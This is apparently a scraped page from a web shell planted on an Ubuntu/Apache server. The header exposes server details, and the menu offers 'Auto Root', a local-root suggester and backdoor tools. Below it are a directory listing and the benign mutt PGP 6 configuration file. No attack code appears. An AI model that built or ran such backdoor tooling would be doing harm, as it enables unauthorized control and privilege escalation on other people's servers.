Linux anchor 4.4.0-210-generic #242-Ubuntu SMP Fri Apr 16 09:57:56 UTC 2021 x86_64
Apache/2.4.18 (Ubuntu)
Server IP : 10.10.100.4 & Your IP : 216.73.217.150
Domains :
Cant Read [ /etc/named.conf ]
User : www-data
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
usr /
share /
doc /
mutt /
examples /
Delete
Unzip
Name
Size
Permission
Date
Action
Mush.rc
441
B
-rw-r--r--
2021-01-22 14:44
Muttrc.gz
37.49
KB
-rw-r--r--
2021-01-22 14:44
Pine.rc
1022
B
-rw-r--r--
2021-01-22 14:44
Tin.rc
606
B
-rw-r--r--
2021-01-22 14:44
colors.angdraug.gz
1.45
KB
-rw-r--r--
2010-05-31 11:27
colors.default
611
B
-rw-r--r--
2021-01-22 14:44
colors.linux
605
B
-rw-r--r--
2021-01-22 14:44
gpg.rc
3.9
KB
-rw-r--r--
2021-01-22 14:44
mutt_xtitle
311
B
-rw-r--r--
2021-01-22 14:44
pgp2.rc
1.57
KB
-rw-r--r--
2021-01-22 14:44
pgp5.rc
1.65
KB
-rw-r--r--
2021-01-22 14:44
pgp6.rc
1.58
KB
-rw-r--r--
2021-01-22 14:44
ray.muttrc
1.93
KB
-rw-r--r--
2010-05-31 11:27
sample.mailcap
134
B
-rw-r--r--
2021-01-22 14:44
sample.muttrc-tlr.gz
4.28
KB
-rw-r--r--
2021-01-22 14:44
sample.muttrc.gz
4.85
KB
-rw-r--r--
2021-01-22 14:44
sidebar.muttrc
2.2
KB
-rw-r--r--
2014-03-21 14:31
smime.rc
3.59
KB
-rw-r--r--
2021-01-22 14:44
smime_keys_test.pl
3.39
KB
-rw-r--r--
2021-01-22 14:44
Save
Rename
# -*-muttrc-*- # # PGP command formats for PGP 6. # # $Id$ # # decode application/pgp set pgp_decode_command="%?p?PGPPASSFD=0; export PGPPASSFD;? cat %?p?-? %f | pgp6 +compatible +verbose=0 +batchmode -f" # verify a pgp/mime signature set pgp_verify_command="pgp6 +compatible +verbose=0 +batchmode -t %s %f" # decrypt a pgp/mime attachment set pgp_decrypt_command="PGPPASSFD=0; export PGPPASSFD; cat - %f | pgp6 +compatible +verbose=0 +batchmode -f" # create a pgp/mime signed attachment set pgp_sign_command="PGPPASSFD=0; export PGPPASSFD; cat - %f | pgp6 +compatible +verbose=0 +batchmode -abfst %?a? -u %a?" # create a pgp/mime encrypted attachment set pgp_encrypt_only_command="pgp6 +compatible +verbose=0 +encrypttoself +batchmode -aeft %r < %f" # create a pgp/mime encrypted and signed attachment set pgp_encrypt_sign_command="PGPPASSFD=0; export PGPPASSFD; cat - %f | pgp6 +compatible +verbose=0 +encrypttoself +batchmode +clearsig=off -aefts %?a? -u %a? %r" # import a key into the public key ring set pgp_import_command="pgp6 +compatible -ka %f " # export a key from the public key ring set pgp_export_command="pgp6 +compatible -kxaf %r" # verify a key set pgp_verify_key_command="pgp6 +compatible -kcc %r" # read in the public key ring set pgp_list_pubring_command="pgpring -5 %r" # read in the secret key ring set pgp_list_secring_command="pgpring -s -5 %r" # create a clearsigned message set pgp_clearsign_command="PGPPASSFD=0; export PGPPASSFD; cat - %f | pgp6 +compatible +verbose=0 +batchmode +clearsig -afst %?a? -u %a?" # fetch keys set pgp_getkeys_command="pkspxycwrap %r"